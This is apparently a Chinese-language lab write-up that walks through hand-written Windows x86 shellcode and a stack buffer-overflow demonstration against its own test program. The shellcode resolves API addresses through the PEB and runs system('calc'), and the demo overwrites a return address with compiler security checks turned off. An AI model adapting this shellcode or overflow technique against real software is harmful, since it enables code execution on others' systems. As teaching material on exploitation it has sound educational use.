shellcode攻击

首先编写shellcode代码

#include "windows.h"  
#include   
#pragma comment(linker,"/SECTION:.data,RWE")   
  
void test()  
{  
  
    char buf[8];  
    strcpy_s(buf, sizeof(shellcode), shellcode);  
}  
  
void test_shellcode()  
{  
    ((void(*)())&shellcode)();  
    /*__asm  
    {  
        lea eax, shellcode;  
        jmp eax;  
    }*/  
}  
  
unsigned char *asm_code()  
{  
    __asm  
    {  
        lea eax, __code  
            jmp __ret  
    }  
    //这里放shellcode的汇编代码  
    __asm  
    {  
    __code:  
        push ebp;  
        mov esi, fs:0x30;            //PEB    
        mov esi, [esi + 0x0C];   //+0x00c Ldr              : Ptr32 _PEB_LDR_DATA    
        mov esi, [esi + 0x1C];  //+0x01c InInitializationOrderModuleList : _LIST_ENTRY    
    next_module:  
        mov ebp, [esi + 0x08];  
        mov edi, [esi + 0x20];  
        mov esi, [esi];  
        cmp[edi + 12 * 2], 0x00;  
        jne next_module;  
        mov edi, ebp; //BaseAddr of Kernel32.dll  
  
        //寻找GetProcAddress地址    
        sub esp, 100;  
        mov ebp, esp;  
        mov eax, [edi + 3ch];//PE头    
        mov edx, [edi + eax + 78h]  
            add edx, edi;  
        mov ecx, [edx + 18h];//函数数量    
        mov ebx, [edx + 20h];  
        add ebx, edi;  
    search:  
        dec ecx;  
        mov esi, [ebx + ecx * 4];  
        add esi, edi;  
        mov eax, 0x50746547;  
        cmp[esi], eax;  
        jne search;  
        mov eax, 0x41636f72;  
        cmp[esi + 4], eax;  
        jne search;  
        mov ebx, [edx + 24h];  
        add ebx, edi;  
        mov cx, [ebx + ecx * 2];  
        mov ebx, [edx + 1ch];  
        add ebx, edi;  
        mov eax, [ebx + ecx * 4];  
        add eax, edi;  
        mov[ebp + 76], eax;//eax为GetProcAddress地址    
  
        //获取LoadLibrary地址    
        push 0;  
        push 0x41797261;  
        push 0x7262694c;  
        push 0x64616f4c;  
        push esp  
            push edi  
            call[ebp + 76]  
            mov[ebp + 80], eax;  
  
        //获取ExitProcess地址    
        push 0;  
        push 0x737365;  
        push 0x636f7250;  
        push 0x74697845;  
        push esp;  
        push edi;  
        call[ebp + 76];  
        mov[ebp + 84], eax;  
  
        ////////////////////////////////////////////我的代码开始    
  
        //获取Sleep地址    
        push 0x70;  
        push 0x65656C53;  
        push esp;  
        push edi;  
        call[ebp + 76];  
        mov[ebp + 88], eax;  
  
        //Sleep(10000)    
        //push 0xFFFFFFFF;  
        //call[ebp + 88];  
  
  
        ///////////////////////////////////////////我的代码结束    
  
        //加载msvcrt.dll   LoadLibrary("msvcrt")    
        push 0;  
        push 0x7472;  
        push 0x6376736d;  
        push esp;  
        call[ebp + 80];  
        mov edi, eax;  
  
        //获取system地址    
        push 0;  
        push 0x6d65;  
        push 0x74737973;  
        push esp;  
        push edi;  
        call[ebp + 76];  
        mov[ebp + 92], eax;  
  
        //system("calc")    
        push 0;  
        push 0x636c6163;  
        push esp;  
        call[ebp + 92];  
  
        //ExitProcess    
        call[ebp + 84];  
    }  
  
    //函数结语  
    __asm int 3  
    __asm { __ret: }  
}  
  
  
int main()  
{  
    unsigned char temp;  
    int i = 1;  
    unsigned char *asm_p = asm_code();  
    FILE *fd = fopen("code.txt", "w");  
    fprintf(fd, "unsigned char shellcode[] = \"");  
    while ((temp = *asm_p) != 0xcc)  
    {  
        fprintf(fd, "\\x%.2x", temp);  
        asm_p++;  
        if (i % 8 == 0) fprintf(fd, "\"\n\"");  
        i++;  
    }  
    fprintf(fd, "\";");  
    fclose(fd);  
    /*__asm  
    {  
        lea eax, shellcode;  
        jmp eax;  
    }*/  
    //((void(*)())&shellcode)();  
    return 0;  
}  

直接运行，之后打开项目所在文件夹，会发现一个code.text文件，打开里面会有已经准备好的unsigned char shellcode[]的初始化。把它放到全局变量里，之后修改main函数代码为

unsigned char shellcode[] = "\x55\x64\x8b\x35\x30\x00\x00\x00"
"\x8b\x76\x0c\x8b\x76\x1c\x8b\x6e"
"\x08\x8b\x7e\x20\x8b\x36\x80\x7f"
"\x18\x00\x75\xf2\x8b\xfd\x83\xec"
"\x64\x8b\xec\x8b\x47\x3c\x8b\x54"
"\x07\x78\x03\xd7\x8b\x4a\x18\x8b"
"\x5a\x20\x03\xdf\x49\x8b\x34\x8b"
"\x03\xf7\xb8\x47\x65\x74\x50\x39"
"\x06\x75\xf1\xb8\x72\x6f\x63\x41"
"\x39\x46\x04\x75\xe7\x8b\x5a\x24"
"\x03\xdf\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x03\xdf\x8b\x04\x8b\x03\xc7"
"\x89\x45\x4c\x6a\x00\x68\x61\x72"
"\x79\x41\x68\x4c\x69\x62\x72\x68"
"\x4c\x6f\x61\x64\x54\x57\xff\x55"
"\x4c\x89\x45\x50\x6a\x00\x68\x65"
"\x73\x73\x00\x68\x50\x72\x6f\x63"
"\x68\x45\x78\x69\x74\x54\x57\xff"
"\x55\x4c\x89\x45\x54\x6a\x70\x68"
"\x53\x6c\x65\x65\x54\x57\xff\x55"
"\x4c\x89\x45\x58\x6a\x00\x68\x72"
"\x74\x00\x00\x68\x6d\x73\x76\x63"
"\x54\xff\x55\x50\x8b\xf8\x6a\x00"
"\x68\x65\x6d\x00\x00\x68\x73\x79"
"\x73\x74\x54\x57\xff\x55\x4c\x89"
"\x45\x5c\x6a\x00\x68\x63\x61\x6c"
"\x63\x54\xff\x55\x5c\xff\x55\x54"
"";
void hacker()
{
    printf("%i", 1);//当该函数被调用时，说明溢出攻击成功了  
    exit(5);
}

void fun(char *str)
{
    char buffer[4];
    memcpy(buffer, str, 16);
}

int main()
{ 
    char badStr[] = "000011112222333344445555";//创建了一个24个字节的字符数组  
    DWORD *pEIP = (DWORD*)&badStr[8];//获取该数组的第八个元素的地址（从第零个开始）  
                                     //*pEIP = (DWORD)&shellcode[0];//获取shellcode数据片开头地址  
    *pEIP = (DWORD)hacker;//获取hacker函数地址（三十二位二进制数），同时赋给pEIP（即修改了badStr的2222变为hacker函数地址）  
    fun(badStr);//开始攻击  
    return 0;
} 

修改基本运行时检查为默认值，修改缓冲区安全检查为否。
运行程序，发现log窗口中出现 ”程序“[0x202C] console1.exe: 本机”已退出，返回值为 5 (0x5)。
说明执行了exit(5)代码，攻击成功。

实验截图